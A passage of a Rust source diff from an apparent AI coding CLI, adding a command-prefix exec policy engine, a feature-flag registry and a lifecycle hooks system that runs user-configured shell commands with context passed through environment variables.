return Err(Error::InvalidRule("justification cannot be empty".to_string()).into());
|
||||
}
|
||||
Some(raw) => Some(raw.to_string()),
|
||||
None => None,
|
||||
};
|
||||
|
||||
let pattern_tokens = parse_pattern(pattern)?;
|
||||
|
||||
let matches: Vec<Vec<String>> =
|
||||
r#match.map(parse_examples).transpose()?.unwrap_or_default();
|
||||
let not_matches: Vec<Vec<String>> = not_match
|
||||
.map(parse_examples)
|
||||
.transpose()?
|
||||
.unwrap_or_default();
|
||||
|
||||
let mut builder = policy_builder(eval);
|
||||
|
||||
let (first_token, remaining_tokens) = pattern_tokens
|
||||
.split_first()
|
||||
.ok_or_else(|| Error::InvalidPattern("pattern cannot be empty".to_string()))?;
|
||||
|
||||
let rest: Arc<[PatternToken]> = remaining_tokens.to_vec().into();
|
||||
|
||||
let rules: Vec<RuleRef> = first_token
|
||||
.alternatives()
|
||||
.iter()
|
||||
.map(|head| {
|
||||
Arc::new(PrefixRule {
|
||||
pattern: PrefixPattern {
|
||||
first: Arc::from(head.as_str()),
|
||||
rest: rest.clone(),
|
||||
},
|
||||
decision,
|
||||
justification: justification.clone(),
|
||||
}) as RuleRef
|
||||
})
|
||||
.collect();
|
||||
|
||||
validate_not_match_examples(&rules, ¬_matches)?;
|
||||
validate_match_examples(&rules, &matches)?;
|
||||
|
||||
rules.into_iter().for_each(|rule| builder.add_rule(rule));
|
||||
Ok(NoneType)
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,147 @@
|
||||
#![allow(dead_code)]
|
||||
|
||||
use super::decision::Decision;
|
||||
use super::error::Error;
|
||||
use super::error::Result;
|
||||
use super::rule::PatternToken;
|
||||
use super::rule::PrefixPattern;
|
||||
use super::rule::PrefixRule;
|
||||
use super::rule::RuleMatch;
|
||||
use super::rule::RuleRef;
|
||||
use multimap::MultiMap;
|
||||
use serde::Deserialize;
|
||||
use serde::Serialize;
|
||||
use std::sync::Arc;
|
||||
|
||||
type HeuristicsFallback<'a> = Option<&'a dyn Fn(&[String]) -> Decision>;
|
||||
|
||||
#[derive(Clone, Debug)]
|
||||
pub struct Policy {
|
||||
rules_by_program: MultiMap<String, RuleRef>,
|
||||
}
|
||||
|
||||
impl Policy {
|
||||
pub fn new(rules_by_program: MultiMap<String, RuleRef>) -> Self {
|
||||
Self { rules_by_program }
|
||||
}
|
||||
|
||||
pub fn empty() -> Self {
|
||||
Self::new(MultiMap::new())
|
||||
}
|
||||
|
||||
pub fn rules(&self) -> &MultiMap<String, RuleRef> {
|
||||
&self.rules_by_program
|
||||
}
|
||||
|
||||
pub fn add_prefix_rule(&mut self, prefix: &[String], decision: Decision) -> Result<()> {
|
||||
let (first_token, rest) = prefix
|
||||
.split_first()
|
||||
.ok_or_else(|| Error::InvalidPattern("prefix cannot be empty".to_string()))?;
|
||||
|
||||
let rule: RuleRef = Arc::new(PrefixRule {
|
||||
pattern: PrefixPattern {
|
||||
first: Arc::from(first_token.as_str()),
|
||||
rest: rest
|
||||
.iter()
|
||||
.map(|token| PatternToken::Single(token.clone()))
|
||||
.collect::<Vec<_>>()
|
||||
.into(),
|
||||
},
|
||||
decision,
|
||||
justification: None,
|
||||
});
|
||||
|
||||
self.rules_by_program.insert(first_token.clone(), rule);
|
||||
Ok(())
|
||||
}
|
||||
|
||||
pub fn check<F>(&self, cmd: &[String], heuristics_fallback: &F) -> Evaluation
|
||||
where
|
||||
F: Fn(&[String]) -> Decision,
|
||||
{
|
||||
let matched_rules = self.matches_for_command(cmd, Some(heuristics_fallback));
|
||||
Evaluation::from_matches(matched_rules)
|
||||
}
|
||||
|
||||
/// Checks multiple commands and aggregates the results.
|
||||
pub fn check_multiple<Commands, F>(
|
||||
&self,
|
||||
commands: Commands,
|
||||
heuristics_fallback: &F,
|
||||
) -> Evaluation
|
||||
where
|
||||
Commands: IntoIterator,
|
||||
Commands::Item: AsRef<[String]>,
|
||||
F: Fn(&[String]) -> Decision,
|
||||
{
|
||||
let matched_rules: Vec<RuleMatch> = commands
|
||||
.into_iter()
|
||||
.flat_map(|command| {
|
||||
self.matches_for_command(command.as_ref(), Some(heuristics_fallback))
|
||||
})
|
||||
.collect();
|
||||
|
||||
Evaluation::from_matches(matched_rules)
|
||||
}
|
||||
|
||||
/// Returns matching rules for the given command. If no rules match and
|
||||
/// `heuristics_fallback` is provided, returns a single
|
||||
/// `HeuristicsRuleMatch` with the decision rendered by
|
||||
/// `heuristics_fallback`.
|
||||
///
|
||||
/// If `heuristics_fallback.is_some()`, then the returned vector is
|
||||
/// guaranteed to be non-empty.
|
||||
pub fn matches_for_command(
|
||||
&self,
|
||||
cmd: &[String],
|
||||
heuristics_fallback: HeuristicsFallback<'_>,
|
||||
) -> Vec<RuleMatch> {
|
||||
let matched_rules: Vec<RuleMatch> = match cmd.first() {
|
||||
Some(first) => self
|
||||
.rules_by_program
|
||||
.get_vec(first)
|
||||
.map(|rules| rules.iter().filter_map(|rule| rule.matches(cmd)).collect())
|
||||
.unwrap_or_default(),
|
||||
None => Vec::new(),
|
||||
};
|
||||
|
||||
if matched_rules.is_empty()
|
||||
&& let Some(heuristics_fallback) = heuristics_fallback
|
||||
{
|
||||
vec![RuleMatch::HeuristicsRuleMatch {
|
||||
command: cmd.to_vec(),
|
||||
decision: heuristics_fallback(cmd),
|
||||
}]
|
||||
} else {
|
||||
matched_rules
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub struct Evaluation {
|
||||
pub decision: Decision,
|
||||
#[serde(rename = "matchedRules")]
|
||||
pub matched_rules: Vec<RuleMatch>,
|
||||
}
|
||||
|
||||
impl Evaluation {
|
||||
pub fn is_match(&self) -> bool {
|
||||
self.matched_rules
|
||||
.iter()
|
||||
.any(|rule_match| !matches!(rule_match, RuleMatch::HeuristicsRuleMatch { .. }))
|
||||
}
|
||||
|
||||
/// Caller is responsible for ensuring that `matched_rules` is non-empty.
|
||||
fn from_matches(matched_rules: Vec<RuleMatch>) -> Self {
|
||||
let decision = matched_rules.iter().map(RuleMatch::decision).max();
|
||||
#[expect(clippy::expect_used)]
|
||||
let decision = decision.expect("invariant failed: matched_rules must be non-empty");
|
||||
|
||||
Self {
|
||||
decision,
|
||||
matched_rules,
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,160 @@
|
||||
use super::decision::Decision;
|
||||
use super::error::Error;
|
||||
use super::error::Result;
|
||||
use serde::Deserialize;
|
||||
use serde::Serialize;
|
||||
use shlex::try_join;
|
||||
use std::any::Any;
|
||||
use std::fmt::Debug;
|
||||
use std::sync::Arc;
|
||||
|
||||
/// Matches a single command token, either a fixed string or one of several allowed alternatives.
|
||||
#[derive(Clone, Debug, Eq, PartialEq)]
|
||||
pub enum PatternToken {
|
||||
Single(String),
|
||||
Alts(Vec<String>),
|
||||
}
|
||||
|
||||
impl PatternToken {
|
||||
fn matches(&self, token: &str) -> bool {
|
||||
match self {
|
||||
Self::Single(expected) => expected == token,
|
||||
Self::Alts(alternatives) => alternatives.iter().any(|alt| alt == token),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn alternatives(&self) -> &[String] {
|
||||
match self {
|
||||
Self::Single(expected) => std::slice::from_ref(expected),
|
||||
Self::Alts(alternatives) => alternatives,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Prefix matcher for commands with support for alternative match tokens.
|
||||
/// First token is fixed since we key by the first token in policy.
|
||||
#[derive(Clone, Debug, Eq, PartialEq)]
|
||||
pub struct PrefixPattern {
|
||||
pub first: Arc<str>,
|
||||
pub rest: Arc<[PatternToken]>,
|
||||
}
|
||||
|
||||
impl PrefixPattern {
|
||||
pub fn matches_prefix(&self, cmd: &[String]) -> Option<Vec<String>> {
|
||||
let pattern_length = self.rest.len() + 1;
|
||||
if cmd.len() < pattern_length || cmd[0] != self.first.as_ref() {
|
||||
return None;
|
||||
}
|
||||
|
||||
for (pattern_token, cmd_token) in self.rest.iter().zip(&cmd[1..pattern_length]) {
|
||||
if !pattern_token.matches(cmd_token) {
|
||||
return None;
|
||||
}
|
||||
}
|
||||
|
||||
Some(cmd[..pattern_length].to_vec())
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Clone, Debug, Eq, PartialEq, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "camelCase")]
|
||||
pub enum RuleMatch {
|
||||
PrefixRuleMatch {
|
||||
#[serde(rename = "matchedPrefix")]
|
||||
matched_prefix: Vec<String>,
|
||||
decision: Decision,
|
||||
/// Optional rationale for why this rule exists.
|
||||
///
|
||||
/// This can be supplied for any decision and may be surfaced in different contexts
|
||||
/// (e.g., prompt reasons or rejection messages).
|
||||
#[serde(skip_serializing_if = "Option::is_none")]
|
||||
justification: Option<String>,
|
||||
},
|
||||
HeuristicsRuleMatch {
|
||||
command: Vec<String>,
|
||||
decision: Decision,
|
||||
},
|
||||
}
|
||||
|
||||
impl RuleMatch {
|
||||
pub fn decision(&self) -> Decision {
|
||||
match self {
|
||||
Self::PrefixRuleMatch { decision, .. } => *decision,
|
||||
Self::HeuristicsRuleMatch { decision, .. } => *decision,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[derive(Clone, Debug, Eq, PartialEq)]
|
||||
pub struct PrefixRule {
|
||||
pub pattern: PrefixPattern,
|
||||
pub decision: Decision,
|
||||
pub justification: Option<String>,
|
||||
}
|
||||
|
||||
pub trait Rule: Any + Debug + Send + Sync {
|
||||
fn program(&self) -> &str;
|
||||
|
||||
fn matches(&self, cmd: &[String]) -> Option<RuleMatch>;
|
||||
}
|
||||
|
||||
pub type RuleRef = Arc<dyn Rule>;
|
||||
|
||||
impl Rule for PrefixRule {
|
||||
fn program(&self) -> &str {
|
||||
self.pattern.first.as_ref()
|
||||
}
|
||||
|
||||
fn matches(&self, cmd: &[String]) -> Option<RuleMatch> {
|
||||
self.pattern
|
||||
.matches_prefix(cmd)
|
||||
.map(|matched_prefix| RuleMatch::PrefixRuleMatch {
|
||||
matched_prefix,
|
||||
decision: self.decision,
|
||||
justification: self.justification.clone(),
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
/// Count how many rules match each provided example and error if any example is unmatched.
|
||||
pub(crate) fn validate_match_examples(rules: &[RuleRef], matches: &[Vec<String>]) -> Result<()> {
|
||||
let mut unmatched_examples = Vec::new();
|
||||
|
||||
for example in matches {
|
||||
if rules.iter().any(|rule| rule.matches(example).is_some()) {
|
||||
continue;
|
||||
}
|
||||
|
||||
unmatched_examples.push(
|
||||
try_join(example.iter().map(String::as_str))
|
||||
.unwrap_or_else(|_| "unable to render example".to_string()),
|
||||
);
|
||||
}
|
||||
|
||||
if unmatched_examples.is_empty() {
|
||||
Ok(())
|
||||
} else {
|
||||
Err(Error::ExampleDidNotMatch {
|
||||
rules: rules.iter().map(|rule| format!("{rule:?}")).collect(),
|
||||
examples: unmatched_examples,
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
/// Ensure that no rule matches any provided negative example.
|
||||
pub(crate) fn validate_not_match_examples(
|
||||
rules: &[RuleRef],
|
||||
not_matches: &[Vec<String>],
|
||||
) -> Result<()> {
|
||||
for example in not_matches {
|
||||
if let Some(rule) = rules.iter().find(|rule| rule.matches(example).is_some()) {
|
||||
return Err(Error::ExampleDidMatch {
|
||||
rule: format!("{rule:?}"),
|
||||
example: try_join(example.iter().map(String::as_str))
|
||||
.unwrap_or_else(|_| "unable to render example".to_string()),
|
||||
});
|
||||
}
|
||||
}
|
||||
|
||||
Ok(())
|
||||
}
|
||||
+192
@@ -0,0 +1,192 @@
|
||||
//! Feature flags and metadata for deepseek-cli.
|
||||
|
||||
#![allow(dead_code)]
|
||||
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::{BTreeMap, BTreeSet};
|
||||
|
||||
/// Lifecycle stage for a feature flag.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
|
||||
pub enum Stage {
|
||||
Experimental,
|
||||
Beta,
|
||||
Stable,
|
||||
Deprecated,
|
||||
Removed,
|
||||
}
|
||||
|
||||
/// Unique features toggled via configuration.
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord, Hash)]
|
||||
pub enum Feature {
|
||||
/// Enable the default shell tool.
|
||||
ShellTool,
|
||||
/// Enable background sub-agent tooling.
|
||||
Subagents,
|
||||
/// Enable web search tool.
|
||||
WebSearch,
|
||||
/// Enable apply_patch tool.
|
||||
ApplyPatch,
|
||||
/// Enable MCP tools.
|
||||
Mcp,
|
||||
/// Enable RLM tools.
|
||||
Rlm,
|
||||
/// Enable Duo tools.
|
||||
Duo,
|
||||
/// Enable execpolicy integration/tooling.
|
||||
ExecPolicy,
|
||||
}
|
||||
|
||||
impl Feature {
|
||||
pub fn key(self) -> &'static str {
|
||||
self.info().key
|
||||
}
|
||||
|
||||
pub fn stage(self) -> Stage {
|
||||
self.info().stage
|
||||
}
|
||||
|
||||
pub fn default_enabled(self) -> bool {
|
||||
self.info().default_enabled
|
||||
}
|
||||
|
||||
fn info(self) -> &'static FeatureSpec {
|
||||
FEATURES
|
||||
.iter()
|
||||
.find(|spec| spec.id == self)
|
||||
.unwrap_or_else(|| unreachable!("missing FeatureSpec for {:?}", self))
|
||||
}
|
||||
}
|
||||
|
||||
/// Holds the effective set of enabled features.
|
||||
#[derive(Debug, Clone, Default, PartialEq)]
|
||||
pub struct Features {
|
||||
enabled: BTreeSet<Feature>,
|
||||
}
|
||||
|
||||
impl Features {
|
||||
/// Starts with built-in defaults.
|
||||
pub fn with_defaults() -> Self {
|
||||
let mut set = BTreeSet::new();
|
||||
for spec in FEATURES {
|
||||
if spec.default_enabled {
|
||||
set.insert(spec.id);
|
||||
}
|
||||
}
|
||||
Self { enabled: set }
|
||||
}
|
||||
|
||||
pub fn enabled(&self, feature: Feature) -> bool {
|
||||
self.enabled.contains(&feature)
|
||||
}
|
||||
|
||||
pub fn enable(&mut self, feature: Feature) -> &mut Self {
|
||||
self.enabled.insert(feature);
|
||||
self
|
||||
}
|
||||
|
||||
pub fn disable(&mut self, feature: Feature) -> &mut Self {
|
||||
self.enabled.remove(&feature);
|
||||
self
|
||||
}
|
||||
|
||||
pub fn apply_map(&mut self, entries: &BTreeMap<String, bool>) {
|
||||
for (key, enabled) in entries {
|
||||
if let Some(feature) = feature_from_key(key) {
|
||||
if *enabled {
|
||||
self.enable(feature);
|
||||
} else {
|
||||
self.disable(feature);
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub fn enabled_features(&self) -> Vec<Feature> {
|
||||
let mut list: Vec<_> = self.enabled.iter().copied().collect();
|
||||
list.sort();
|
||||
list
|
||||
}
|
||||
}
|
||||
|
||||
/// Keys accepted in `[features]` tables.
|
||||
pub fn is_known_feature_key(key: &str) -> bool {
|
||||
FEATURES.iter().any(|spec| spec.key == key)
|
||||
}
|
||||
|
||||
pub fn feature_from_key(key: &str) -> Option<Feature> {
|
||||
FEATURES
|
||||
.iter()
|
||||
.find(|spec| spec.key == key)
|
||||
.map(|spec| spec.id)
|
||||
}
|
||||
|
||||
pub fn feature_spec_by_key(key: &str) -> Option<&'static FeatureSpec> {
|
||||
FEATURES.iter().find(|spec| spec.key == key)
|
||||
}
|
||||
|
||||
/// Deserializable features table for TOML.
|
||||
#[derive(Serialize, Deserialize, Debug, Clone, Default, PartialEq)]
|
||||
pub struct FeaturesToml {
|
||||
#[serde(flatten)]
|
||||
pub entries: BTreeMap<String, bool>,
|
||||
}
|
||||
|
||||
/// Single registry of all feature definitions.
|
||||
#[derive(Debug, Clone, Copy)]
|
||||
pub struct FeatureSpec {
|
||||
pub id: Feature,
|
||||
pub key: &'static str,
|
||||
pub stage: Stage,
|
||||
pub default_enabled: bool,
|
||||
}
|
||||
|
||||
pub const FEATURES: &[FeatureSpec] = &[
|
||||
FeatureSpec {
|
||||
id: Feature::ShellTool,
|
||||
key: "shell_tool",
|
||||
stage: Stage::Stable,
|
||||
default_enabled: true,
|
||||
},
|
||||
FeatureSpec {
|
||||
id: Feature::Subagents,
|
||||
key: "subagents",
|
||||
stage: Stage::Experimental,
|
||||
default_enabled: true,
|
||||
},
|
||||
FeatureSpec {
|
||||
id: Feature::WebSearch,
|
||||
key: "web_search",
|
||||
stage: Stage::Experimental,
|
||||
default_enabled: true,
|
||||
},
|
||||
FeatureSpec {
|
||||
id: Feature::ApplyPatch,
|
||||
key: "apply_patch",
|
||||
stage: Stage::Experimental,
|
||||
default_enabled: true,
|
||||
},
|
||||
FeatureSpec {
|
||||
id: Feature::Mcp,
|
||||
key: "mcp",
|
||||
stage: Stage::Experimental,
|
||||
default_enabled: true,
|
||||
},
|
||||
FeatureSpec {
|
||||
id: Feature::Rlm,
|
||||
key: "rlm",
|
||||
stage: Stage::Experimental,
|
||||
default_enabled: true,
|
||||
},
|
||||
FeatureSpec {
|
||||
id: Feature::Duo,
|
||||
key: "duo",
|
||||
stage: Stage::Experimental,
|
||||
default_enabled: true,
|
||||
},
|
||||
FeatureSpec {
|
||||
id: Feature::ExecPolicy,
|
||||
key: "exec_policy",
|
||||
stage: Stage::Experimental,
|
||||
default_enabled: true,
|
||||
},
|
||||
];
|
||||
+787
@@ -0,0 +1,787 @@
|
||||
//! Hooks system for `DeepSeek` CLI
|
||||
//!
|
||||
//! Provides lifecycle hooks that execute user-defined shell commands at:
|
||||
//! - Session start/end
|
||||
//! - Tool call before/after
|
||||
|
||||
#![allow(dead_code)]
|
||||
//! - Mode changes
|
||||
//! - Message submission
|
||||
//! - Error events
|
||||
//!
|
||||
//! Configuration is done via `[[hooks.hooks]]` in config.toml.
|
||||
|
||||
// Note: anyhow is available if needed for future error handling
|
||||
#[allow(unused_imports)]
|
||||
use anyhow::{Context, Result};
|
||||
use serde::{Deserialize, Serialize};
|
||||
use std::collections::HashMap;
|
||||
use std::io::Read;
|
||||
use std::path::PathBuf;
|
||||
use std::process::{Command, Stdio};
|
||||
use std::time::{Duration, Instant};
|
||||
use wait_timeout::ChildExt;
|
||||
|
||||
/// Events that can trigger hook execution
|
||||
#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash, Serialize, Deserialize)]
|
||||
#[serde(rename_all = "snake_case")]
|
||||
pub enum HookEvent {
|
||||
/// Triggered when a new session starts
|
||||
SessionStart,
|
||||
/// Triggered when a session ends (quit, Ctrl+C)
|
||||
SessionEnd,
|
||||
/// Triggered before a user message is sent to the LLM
|
||||
MessageSubmit,
|
||||
/// Triggered before a tool is executed
|
||||
ToolCallBefore,
|
||||
/// Triggered after a tool completes (success or failure)
|
||||
ToolCallAfter,
|
||||
/// Triggered when the user changes modes (Normal, Edit, Agent, Plan)
|
||||
ModeChange,
|
||||
/// Triggered when an error occurs
|
||||
OnError,
|
||||
}
|
||||
|
||||
impl HookEvent {
|
||||
/// Get string representation for environment variable
|
||||
pub fn as_str(self) -> &'static str {
|
||||
match self {
|
||||
HookEvent::SessionStart => "session_start",
|
||||
HookEvent::SessionEnd => "session_end",
|
||||
HookEvent::MessageSubmit => "message_submit",
|
||||
HookEvent::ToolCallBefore => "tool_call_before",
|
||||
HookEvent::ToolCallAfter => "tool_call_after",
|
||||
HookEvent::ModeChange => "mode_change",
|
||||
HookEvent::OnError => "on_error",
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
/// Condition for when a hook should run
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
#[serde(tag = "type", rename_all = "snake_case")]
|
||||
#[derive(Default)]
|
||||
pub enum HookCondition {
|
||||
/// Always run this hook
|
||||
#[default]
|
||||
Always,
|
||||
/// Only run for specific tool names
|
||||
ToolName {
|
||||
/// Tool name to match (e.g., "`exec_shell`", "`write_file`")
|
||||
name: String,
|
||||
},
|
||||
/// Only run for specific tool categories
|
||||
ToolCategory {
|
||||
/// Category: "safe", "`file_write`", "shell"
|
||||
category: String,
|
||||
},
|
||||
/// Only run in specific modes
|
||||
Mode {
|
||||
/// Mode: "plan", "agent", "yolo", "rlm", "duo"
|
||||
mode: String,
|
||||
},
|
||||
/// Only run when exit code matches (for `ToolCallAfter`)
|
||||
ExitCode {
|
||||
/// Exit code to match
|
||||
code: i32,
|
||||
},
|
||||
/// Combine multiple conditions with AND
|
||||
All { conditions: Vec<HookCondition> },
|
||||
/// Combine multiple conditions with OR
|
||||
Any { conditions: Vec<HookCondition> },
|
||||
}
|
||||
|
||||
/// A single hook definition
|
||||
#[derive(Debug, Clone, Serialize, Deserialize)]
|
||||
pub struct Hook {
|
||||
/// The event that triggers this hook
|
||||
pub event: HookEvent,
|
||||
|
||||
/// Shell command to execute (platform shell: `sh -c` on Unix, `cmd /C` on Windows)
|
||||
pub command: String,
|
||||
|
||||
/// Optional condition for when this hook should run
|
||||
#[serde(default)]
|
||||
pub condition: Option<HookCondition>,
|
||||
|
||||
/// Timeout in seconds (default: 30)
|
||||
#[serde(default = "default_timeout")]
|
||||
pub timeout_secs: u64,
|
||||
|
||||
/// Run in background (don't wait for completion)
|
||||
#[serde(default)]
|
||||
pub background: bool,
|
||||
|
||||
/// Continue if this hook fails (default: true)
|
||||
#[serde(default = "default_continue_on_error")]
|
||||
pub continue_on_error: bool,
|
||||
|
||||
/// Optional name for logging/debugging
|
||||
#[serde(default)]
|
||||
pub name: Option<String>,
|
||||
}
|
||||
|
||||
fn default_timeout() -> u64 {
|
||||
30
|
||||
}
|
||||
fn default_continue_on_error() -> bool {
|
||||
true
|
||||
}
|
||||
|
||||
impl Hook {
|
||||
/// Create a new hook with minimal configuration
|
||||
pub fn new(event: HookEvent, command: &str) -> Self {
|
||||
Self {
|
||||
event,
|
||||
command: command.to_string(),
|
||||
condition: None,
|
||||
timeout_secs: 30,
|
||||
background: false,
|
||||
continue_on_error: true,
|
||||
name: None,
|
||||
}
|
||||
}
|
||||
|
||||
/// Builder: set condition
|
||||
pub fn with_condition(mut self, condition: HookCondition) -> Self {
|
||||
self.condition = Some(condition);
|
||||
self
|
||||
}
|
||||
|
||||
/// Builder: set timeout
|
||||
pub fn with_timeout(mut self, secs: u64) -> Self {
|
||||
self.timeout_secs = secs;
|
||||
self
|
||||
}
|
||||
|
||||
/// Builder: run in background
|
||||
pub fn background(mut self) -> Self {
|
||||
self.background = true;
|
||||
self
|
||||
}
|
||||
|
||||
/// Builder: set name
|
||||
pub fn with_name(mut self, name: &str) -> Self {
|
||||
self.name = Some(name.to_string());
|
||||
self
|
||||
}
|
||||
}
|
||||
|
||||
/// Configuration for hooks (loaded from config.toml)
|
||||
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
|
||||
pub struct HooksConfig {
|
||||
/// List of hooks to execute
|
||||
#[serde(default)]
|
||||
pub hooks: Vec<Hook>,
|
||||
|
||||
/// Global enable/disable for all hooks
|
||||
#[serde(default = "default_enabled")]
|
||||
pub enabled: bool,
|
||||
|
||||
/// Global timeout override (applies if hook doesn't specify one)
|
||||
#[serde(default)]
|
||||
pub default_timeout_secs: Option<u64>,
|
||||
|
||||
/// Working directory for hook execution (default: workspace)
|
||||
#[serde(default)]
|
||||
pub working_dir: Option<PathBuf>,
|
||||
}
|
||||
|
||||
fn default_enabled() -> bool {
|
||||
true
|
||||
}
|
||||
|
||||
impl HooksConfig {
|
||||
/// Get hooks for a specific event
|
||||
pub fn hooks_for_event(&self, event: HookEvent) -> Vec<&Hook> {
|
||||
if !self.enabled {
|
||||
return Vec::new();
|
||||
}
|
||||
self.hooks.iter().filter(|h| h.event == event).collect()
|
||||
}
|
||||
|
||||
/// Check if hooks are configured and enabled
|
||||
pub fn has_hooks(&self) -> bool {
|
||||
self.enabled && !self.hooks.is_empty()
|
||||
}
|
||||
}
|
||||
|
||||
/// Context passed to hooks via environment variables
|
||||
#[derive(Debug, Clone, Default)]
|
||||
pub struct HookContext {
|
||||
/// Tool name (for ToolCallBefore/After)
|
||||
pub tool_name: Option<String>,
|
||||
/// Tool arguments as JSON string
|
||||
pub tool_args: Option<String>,
|
||||
/// Tool result output (truncated)
|
||||
pub tool_result: Option<String>,
|
||||
/// Tool exit code if applicable
|
||||
pub tool_exit_code: Option<i32>,
|
||||
/// Whether tool succeeded
|
||||
pub tool_success: Option<bool>,
|
||||
/// Current mode
|
||||
pub mode: Option<String>,
|
||||
/// Previous mode (for `ModeChange`)
|
||||
pub previous_mode: Option<String>,
|
||||
/// Session ID
|
||||
pub session_id: Option<String>,
|
||||
/// User message content
|
||||
pub message: Option<String>,
|
||||
/// Error message (for `OnError`)
|
||||
pub error_message: Option<String>,
|
||||
/// Workspace path
|
||||
pub workspace: Option<PathBuf>,
|
||||
/// Current model name
|
||||
pub model: Option<String>,
|
||||
/// Total tokens used
|
||||
pub total_tokens: Option<u32>,
|
||||
/// Session cost in USD
|
||||
pub session_cost: Option<f64>,
|
||||
}
|
||||
|
||||
impl HookContext {
|
||||
pub fn new() -> Self {
|
||||
Self::default()
|
||||
}
|
||||
|
||||
pub fn with_tool_name(mut self, name: &str) -> Self {
|
||||
self.tool_name = Some(name.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_tool_args(mut self, args: &serde_json::Value) -> Self {
|
||||
self.tool_args = Some(args.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_tool_result(mut self, result: &str, success: bool, exit_code: Option<i32>) -> Self {
|
||||
self.tool_result = Some(result.to_string());
|
||||
self.tool_success = Some(success);
|
||||
self.tool_exit_code = exit_code;
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_mode(mut self, mode: &str) -> Self {
|
||||
self.mode = Some(mode.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_previous_mode(mut self, mode: &str) -> Self {
|
||||
self.previous_mode = Some(mode.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_workspace(mut self, path: PathBuf) -> Self {
|
||||
self.workspace = Some(path);
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_model(mut self, model: &str) -> Self {
|
||||
self.model = Some(model.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_session_id(mut self, session_id: &str) -> Self {
|
||||
self.session_id = Some(session_id.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_message(mut self, message: &str) -> Self {
|
||||
self.message = Some(message.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_error(mut self, error: &str) -> Self {
|
||||
self.error_message = Some(error.to_string());
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_tokens(mut self, tokens: u32) -> Self {
|
||||
self.total_tokens = Some(tokens);
|
||||
self
|
||||
}
|
||||
|
||||
pub fn with_cost(mut self, cost: f64) -> Self {
|
||||
self.session_cost = Some(cost);
|
||||
self
|
||||
}
|
||||
|
||||
/// Convert to environment variables
|
||||
pub fn to_env_vars(&self) -> HashMap<String, String> {
|
||||
let mut env = HashMap::new();
|
||||
|
||||
if let Some(ref name) = self.tool_name {
|
||||
env.insert("DEEPSEEK_TOOL_NAME".to_string(), name.clone());
|
||||
}
|
||||
if let Some(ref args) = self.tool_args {
|
||||
env.insert("DEEPSEEK_TOOL_ARGS".to_string(), args.clone());
|
||||
}
|
||||
if let Some(ref result) = self.tool_result {
|
||||
// Truncate result to 10KB to avoid environment variable size limits
|
||||
let truncated = if result.len() > 10000 {
|
||||
format!("{}...[truncated]", &result[..10000])
|
||||
} else {
|
||||
result.clone()
|
||||
};
|
||||
env.insert("DEEPSEEK_TOOL_RESULT".to_string(), truncated);
|
||||
}
|
||||
if let Some(code) = self.tool_exit_code {
|
||||
env.insert("DEEPSEEK_TOOL_EXIT_CODE".to_string(), code.to_string());
|
||||
}
|
||||
if let Some(success) = self.tool_success {
|
||||
env.insert("DEEPSEEK_TOOL_SUCCESS".to_string(), success.to_string());
|
||||
}
|
||||
if let Some(ref mode) = self.mode {
|
||||
env.insert("DEEPSEEK_MODE".to_string(), mode.clone());
|
||||
}
|
||||
if let Some(ref prev) = self.previous_mode {
|
||||
env.insert("DEEPSEEK_PREVIOUS_MODE".to_string(), prev.clone());
|
||||
}
|
||||
if let Some(ref session_id) = self.session_id {
|
||||
env.insert("DEEPSEEK_SESSION_ID".to_string(), session_id.clone());
|
||||
}
|
||||
if let Some(ref message) = self.message {
|
||||
// Truncate message to prevent env var issues
|
||||
let truncated = if message.len() > 5000 {
|
||||
format!("{}...[truncated]", &message[..5000])
|
||||
} else {
|
||||
message.clone()
|
||||
};
|
||||
env.insert("DEEPSEEK_MESSAGE".to_string(), truncated);
|
||||
}
|
||||
if let Some(ref error) = self.error_message {
|
||||
env.insert("DEEPSEEK_ERROR".to_string(), error.clone());
|
||||
}
|
||||
if let Some(ref ws) = self.workspace {
|
||||
env.insert("DEEPSEEK_WORKSPACE".to_string(), ws.display().to_string());
|
||||
}
|
||||
if let Some(ref model) = self.model {
|
||||
env.insert("DEEPSEEK_MODEL".to_string(), model.clone());
|
||||
}
|
||||
if let Some(tokens) = self.total_tokens {
|
||||
env.insert("DEEPSEEK_TOTAL_TOKENS".to_string(), tokens.to_string());
|
||||
}
|
||||
if let Some(cost) = self.session_cost {
|
||||
env.insert("DEEPSEEK_SESSION_COST".to_string(), format!("{cost:.6}"));
|
||||
}
|
||||
|
||||
env
|
||||
}
|
||||
}
|
||||
|
||||
/// Result of a hook execution
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct HookResult {
|
||||
/// Hook name (if specified)
|
||||
pub name: Option<String>,
|
||||
/// Whether the hook succeeded
|
||||
pub success: bool,
|
||||
/// Exit code from the hook command
|
||||
pub exit_code: Option<i32>,
|
||||
/// Standard output
|
||||
pub stdout: String,
|
||||
/// Standard error
|
||||
pub stderr: String,
|
||||
/// Time taken to execute
|
||||
